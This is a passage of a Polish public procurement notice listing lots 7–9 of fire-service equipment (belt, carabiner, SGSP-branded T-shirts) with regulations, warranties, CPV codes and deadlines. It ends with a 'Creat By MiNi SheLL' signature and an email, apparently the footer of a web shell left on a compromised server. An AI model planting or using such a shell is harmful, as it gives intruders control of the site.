Zgodne z obowiązującymi przepisami w tym z §17 Rozporządzenia MSWiA z dnia               20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z późn. zm.).

Gwarancja:
Minimum 24 m-ce..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.40.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pas strażacki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonany zgodnie z wymaganiami techniczno - użytkowymi pkt. 1.5. Pasy strażackie określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z późn. zm.).

Oznakowanie wyrobu:
Zgodne z obowiązującymi przepisami w tym z §17 Rozporządzenia MSWiA z dnia      20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z późn. zm.).

Gwarancja:
Minimum 24 m-ce..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.40.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zatrzaśnik strażacki duży.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zatrzaśnik strażacki duży: Wykonany zgodnie z wymaganiami techniczno - użytkowymi    pkt. 5.6. Zatrzaśniki określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z późn. zm.).

Oznakowanie wyrobu:
Zgodne z obowiązującymi przepisami w tym z §17 Rozporządzenia MSWiA z dnia       20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z późn. zm.).

Gwarancja:
Minimum 12 m-cy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.40.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Koszulka letnia i koszulka zimowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koszulka letnia: Wykonana zgodnie z Zarządzeniem Nr 9 Komendanta Głównego Państwowej Straży Pożarnej (Dziennik Urzędowy nr 2 KG PSP z 2009 r.) w sprawie wzorców oraz szczegółowych wymagań cech technicznych i jakościowych przedmiotów umundurowania, odzieży specjalnej i środków ochrony indywidualnej użytkowanych w PSP - Numer karty wymagań technicznych: KT 6
Ponadto:
Zamiast wymaganego w KT 6 pkt. 2.5. emblematu PSP i napisu STRAŻ, koszulka musi posiadać:

1. W przodzie koszulki po lewej stronie na wysokości piersi kieszeń z logo SGSP wg. wzoru:

średnica 67 mm (tolerancja 1 mm)

Opis logo:
Znak ma po lewej stronie połowę krzyża maltańskiego w kolorze granatowym, a po prawej trzy języki płomienia w kolorze czerwonym, wszystko w wieńcu z liści w kolorze złotym.     W dole litery SGSP  w kolorze czarnym na czworoboku w kolorze złotym mającym jeden bok wypukły i jeden wklęsły, przy czym wszystkie elementy obrazowe mają kontur w kolorze czarnym.

2. Na plecach napis SGSP o wymiarach : długość 28,30 cm x wysokość 6,46 cm.
    Kolor zgodny z KT 6 jak napis STRAŻ.

Logo i napis wykonane metodą haftu komputerowego bądź inną techniką pozwalającą odwzorować ww. elementy, zgodnie z KT 6.


Koszulka zimowa: Wykonana zgodnie z Zarządzeniem Nr 9 Komendanta Głównego Państwowej Straży Pożarnej (Dziennik Urzędowy nr 2 KG PSP z 2009 r.) w sprawie wzorców oraz szczegółowych wymagań cech technicznych i jakościowych przedmiotów umundurowania, odzieży specjalnej i środków ochrony indywidualnej użytkowanych w PSP - Numer karty wymagań technicznych: KT 7.

Gwarancja:
Minimum 12 m-cy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.33.20.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.07.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com